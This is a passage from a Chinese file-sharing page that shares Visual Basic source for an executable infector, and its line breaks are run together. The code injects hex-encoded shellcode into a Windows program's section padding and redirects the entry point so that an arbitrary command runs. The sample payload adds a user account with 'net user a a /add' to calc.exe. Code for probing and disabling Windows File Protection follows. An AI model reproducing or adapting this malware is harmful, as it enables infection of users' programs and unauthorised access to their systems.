vb版感染源码.txt
《vb版感染源码.txt》由会员分享,可在线阅读,更多相关《vb版感染源码.txt(18页珍藏版)》请在文库网上搜索。
1、vbgoodOption ExplicitPrivate Declare Function SfcIsFileProtected Lib sfc_os.dll Alias #5 _ (ByVal dwUnknown1 As Long, ByVal lpszFile As Long, ByVal dwUnknown2 As Long) As LongPrivate Sub Command1_Click()On Error GoTo 10Dim szFile As StringszFile = c:windowssystem32sethc.exe + vbNullCharIf SfcIsFileP
2、rotected(0, StrPtr(szFile), -1) = 0 ThenInfectPE c:windowssystem32calc.exe, cmd /c net user a a /addElseMsgBox xxEnd IfEnd SubPublic Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As LongDim i As Long, p As Long, q As Long, sHex As StringOn Error GoTo ERR: ShellcodesHex
3、 = 605583EC408BEC5564A1300000008B400C8B701CAD8B78088B473C8B54077803D78B4A188B5A2003 & _ DF498B348B03F7B847657450390675F1B8726F634139460475E78B5A2403DF668B0C4B8B5A1C03DF & _ 8B048B03C789454068786563006857696E455457FF55408945086A00680000000068000000006800 & _ 00000054FF550861E900000000For i = 0 To 132
4、 PatchCode(i) = Val(&H & Mid(sHex, i * 2 + 1, 2)Next iwinexecShellcodeIf Len(strRunFile) 12 Then MsgBox Shellcode, , MSGBOX: Exit FunctionIf Dir(strTargetFile) = Then MsgBox , , MSGBOX: Exit FunctionShellcodeFor i = 1 To 4 PatchCode(118 + i) = &H & Hex(Asc(Mid(strRunFile, i, 1)NextstrRunFile = Mid(s
5、trRunFile, 5)If Len(strRunFile) 4 Then For i = 1 To 4 PatchCode(113 + i) = &H & Hex(Asc(Mid(strRunFile, i, 1) Next strRunFile = Mid(strRunFile, 5) For i = 1 To Len(strRunFile) PatchCode(108 + i) = &H & Hex(Asc(Mid(strRunFile, i, 1) NextElse For i = 1 To Len(strRunFile) PatchCode(113 + i) = &H & Hex(
6、Asc(Mid(strRunFile, i, 1) NextEnd IfShellcodeNOption ExplicitPrivate Declare Sub CopyMemory Lib kernel32 Alias RtlMoveMemory (pDst As Any, pSrc As Any, ByVal ByteLen As Long)Private Type SectionHeaderName As String * 8RVA As LongVirtualSize As LongPhysicalSize As LongOffset As Longflags As LongEnd T
7、ypePrivate Const NeededArea As Long = 133Dim PE() As Byte, e_lfanew As Long, NumberOfSections As Long, SizeOfOptionalHeader As Long, AddressOfEntryPoint As Long, NumberOfRvaAndSizes As LongDim EncStart As Long, EncEnd As Long, SectionTableOffset As Long, SectionTable() As SectionHeader, EntrySection
8、 As Long, PaddingArea As Long, tmp As LongDim PatchCode(NeededArea - 1) As BytePublic Function InfectPE(ByVal strTargetFile As String, ByVal strRunFile As String) As LongOn Error GoTo ERR: ShellcodePatchCode(0) = &H60PatchCode(1) = &H55PatchCode(2) = &H83PatchCode(3) = &HECPatchCode(4) = &H40PatchCo
9、de(5) = &H8BPatchCode(6) = &HECPatchCode(7) = &H55PatchCode(8) = &H64PatchCode(9) = &HA1PatchCode(10) = &H30PatchCode(11) = &H0PatchCode(12) = &H0PatchCode(13) = &H0PatchCode(14) = &H8BPatchCode(15) = &H40PatchCode(16) = &HCPatchCode(17) = &H8BPatchCode(18) = &H70PatchCode(19) = &H1CPatchCode(20) =
10、&HADPatchCode(21) = &H8BPatchCode(22) = &H78PatchCode(23) = &H8PatchCode(24) = &H8BPatchCode(25) = &H47PatchCode(26) = &H3CPatchCode(27) = &H8BPatchCode(28) = &H54PatchCode(29) = &H7PatchCode(30) = &H78PatchCode(31) = &H3PatchCode(32) = &HD7PatchCode(33) = &H8BPatchCode(34) = &H4APatchCode(35) = &H1
11、8PatchCode(36) = &H8BPatchCode(37) = &H5APatchCode(38) = &H20PatchCode(39) = &H3PatchCode(40) = &HDFPatchCode(41) = &H49PatchCode(42) = &H8BPatchCode(43) = &H34PatchCode(44) = &H8BPatchCode(45) = &H3PatchCode(46) = &HF7PatchCode(47) = &HB8PatchCode(48) = &H47PatchCode(49) = &H65PatchCode(50) = &H74P
12、atchCode(51) = &H50PatchCode(52) = &H39PatchCode(53) = &H6PatchCode(54) = &H75PatchCode(55) = &HF1PatchCode(56) = &HB8PatchCode(57) = &H72PatchCode(58) = &H6FPatchCode(59) = &H63PatchCode(60) = &H41PatchCode(61) = &H39PatchCode(62) = &H46PatchCode(63) = &H4PatchCode(64) = &H75PatchCode(65) = &HE7Pat
13、chCode(66) = &H8BPatchCode(67) = &H5APatchCode(68) = &H24PatchCode(69) = &H3PatchCode(70) = &HDFPatchCode(71) = &H66PatchCode(72) = &H8BPatchCode(73) = &HCPatchCode(74) = &H4BPatchCode(75) = &H8BPatchCode(76) = &H5APatchCode(77) = &H1CPatchCode(78) = &H3PatchCode(79) = &HDFPatchCode(80) = &H8BPatchC
14、ode(81) = &H4PatchCode(82) = &H8BPatchCode(83) = &H3PatchCode(84) = &HC7PatchCode(85) = &H89PatchCode(86) = &H45PatchCode(87) = &H40PatchCode(88) = &H68PatchCode(89) = &H78PatchCode(90) = &H65PatchCode(91) = &H63PatchCode(92) = &H0PatchCode(93) = &H68PatchCode(94) = &H57PatchCode(95) = &H69PatchCode
15、(96) = &H6EPatchCode(97) = &H45PatchCode(98) = &H54PatchCode(99) = &H57PatchCode(100) = &HFFPatchCode(101) = &H55PatchCode(102) = &H40PatchCode(103) = &H89PatchCode(104) = &H45PatchCode(105) = &H8PatchCode(106) = &H6APatchCode(107) = &H0PatchCode(108) = &H68PatchCode(109) = &H2EPatchCode(110) = &H65
16、PatchCode(111) = &H78PatchCode(112) = &H65PatchCode(113) = &H68PatchCode(114) = &H35PatchCode(115) = &H36PatchCode(116) = &H37PatchCode(117) = &H38PatchCode(118) = &H68PatchCode(119) = &H31PatchCode(120) = &H32PatchCode(121) = &H33PatchCode(122) = &H34PatchCode(123) = &H54PatchCode(124) = &HFFPatchC
17、ode(125) = &H55PatchCode(126) = &H8PatchCode(127) = &H61PatchCode(128) = &HE9winexecShellcodeDim i As Long, p As Long, q As LongIf Len(strRunFile) 12 Then MsgBox Shellcode, , MSGBOX: Exit FunctionIf Dir(strTargetFile) = Then MsgBox , , MSGBOX: Exit FunctionShellcodePatchCode(119) = &H & Hex(Asc(Mid(
18、strRunFile, 1, 1)PatchCode(120) = &H & Hex(Asc(Mid(strRunFile, 2, 1)PatchCode(121) = &H & Hex(Asc(Mid(strRunFile, 3, 1)PatchCode(122) = &H & Hex(Asc(Mid(strRunFile, 4, 1)strRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)If Len(strRunFile) 4 ThenFor i = 1 To 4PatchCode(113 + i) = &H & Hex(Asc(Mid(s
19、trRunFile, i, 1)NextstrRunFile = Mid(strRunFile, 5, Len(strRunFile) - 4)Dim j As IntegerFor j = 1 To Len(strRunFile)PatchCode(108 + j) = &H & Hex(Asc(Mid(strRunFile, j, 1)NextIf Len(strRunFile) 4 Then PatchCode(110 + Len(strRunFile) = &H0ElseIf Len(strRunFile) = 4 ThenFor i = 1 To 4PatchCode(113 + i
20、) = &H & Hex(Asc(Mid(strRunFile, i, 1)PatchCode(109) = &H0NextElseFor i = 1 To Len(strRunFile)PatchCode(113 + i) = &H & Hex(Asc(Mid(strRunFile, i, 1)NextPatchCode(114 + Len(strRunFile) = &H0End IfShellcodeNReDim PE(FileLen(strTargetFile) - 1) PEOpen strTargetFile For Binary As #1 PEGet #1, , PEClose
21、 #1e_lfanew = ReadDword(&H3C&)NumberOfSections = ReadWord(e_lfanew + 6)SizeOfOptionalHeader = ReadWord(e_lfanew + &H14&)AddressOfEntryPoint = ReadWord(e_lfanew + &H28&) If SizeOfOptionalHeader = &H60& ThenNumberOfRvaAndSizes = ReadDword(e_lfanew + &H74&)ElseNumberOfRvaAndSizes = 0End IfIf NumberOfRv
22、aAndSizes 16 Then NumberOfRvaAndSizes = 16If NumberOfRvaAndSizes (SizeOfOptionalHeader - &H60&) 8 Then NumberOfRvaAndSizes = (SizeOfOptionalHeader - &H60&) 8NumberOfRvaAndSizes = NumberOfRvaAndSizes - 1EncStart = 0: EncEnd = &H7FFFFFFFFor i = 0 To NumberOfRvaAndSizesp = ReadDword(e_lfanew + &H78& +
23、i * 8)q = p + ReadDword(e_lfanew + &H7C& + i * 8)If p q ThenExit FunctionElseIf p AddressOfEntryPoint And q = EncStart Then EncStart = q + 1ElseIf p AddressOfEntryPoint And q AddressOfEntryPoint ThenIf p = .RVA) And (AddressOfEntryPoint = .RVA + .VirtualSize) Then EntrySection = iEnd IfEnd WithNextI
24、f EntrySection = -1 Then Exit FunctionWith SectionTable(EntrySection)PaddingArea = .PhysicalSize - .VirtualSizeIf PaddingArea NeededArea ThenExit FunctionEnd IfFor i = .Offset + .VirtualSize To .Offset + .PhysicalSize - 1If PE(i) 0 ThenIf MsgBox(Padding Area seems to have data, do you really want to
25、 continue?, vbQuestion Or vbYesNo) = vbYes ThenExit ForElseExit FunctionEnd IfEnd IfNextIf .RVA EncStart Then EncStart = .RVAIf .RVA + .VirtualSize - 1 EncEnd Then EncEnd = .RVA + .VirtualSize - 1tmp = AddressOfEntryPoint - (.RVA + .VirtualSize + NeededArea)CopyMemory PatchCode(129), tmp, 4CopyMemor
26、y PE(.Offset + .VirtualSize), PatchCode(0), NeededAreaAddressOfEntryPoint = .RVA + .VirtualSizeWriteDword e_lfanew + &H28&, AddressOfEntryPoint.VirtualSize = .VirtualSize + NeededAreaWriteDword SectionTableOffset + EntrySection * &H28& + &H8&, .VirtualSize.flags = .flags Or &H80000000WriteDword Sect
27、ionTableOffset + EntrySection * &H28& + &H24&, .flagsEnd WithOpen strTargetFile & .exe For Binary As #1 Put #1, , PEClose #1InfectPE = 1Exit FunctionERR:InfectPE = 0End FunctionPrivate Function ReadWord(ByVal Offset As Long) As LongCopyMemory ReadWord, PE(Offset), 2End FunctionPrivate Function ReadD
28、word(ByVal Offset As Long) As LongCopyMemory ReadDword, PE(Offset), 4End FunctionPrivate Sub WriteDword(ByVal Offset As Long, ByVal Data As Long)CopyMemory PE(Offset), Data, 4End SubPrivate Function Add0To8(ByVal InputStr As String) As StringAdd0To8 = String(8 - Len(InputStr), 0) & InputStrEnd Funct
29、ionPrivate Function Read8Str(ByVal Offset As Long) As StringDim i As Long, c As Byte, s As StringFor i = 0 To 7c = PE(Offset + i)If c 127 Then c = 32s = s & Chr(c)NextRead8Str = sEnd FunctiondelhpiKillSFCunit KillSFC;interfaceusesWindows, SysUtils, WinLogonProcess;Function CloseSFC():Integer;impleme
30、ntationprocedure Root(VOID : Pointer); stdcall; forward;procedure EndRoot(); forward;function FixedPChar(const Value : PChar) : PChar;forward;typeTLoadLibraryA = function(lpLibFileName : PAnsiChar) : HMODULE; stdcall;TGetProcAddress = function(hModule : HMODULE; lpProcName : LPCSTR) : FARPROC; stdca
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- vb版感染EXE源码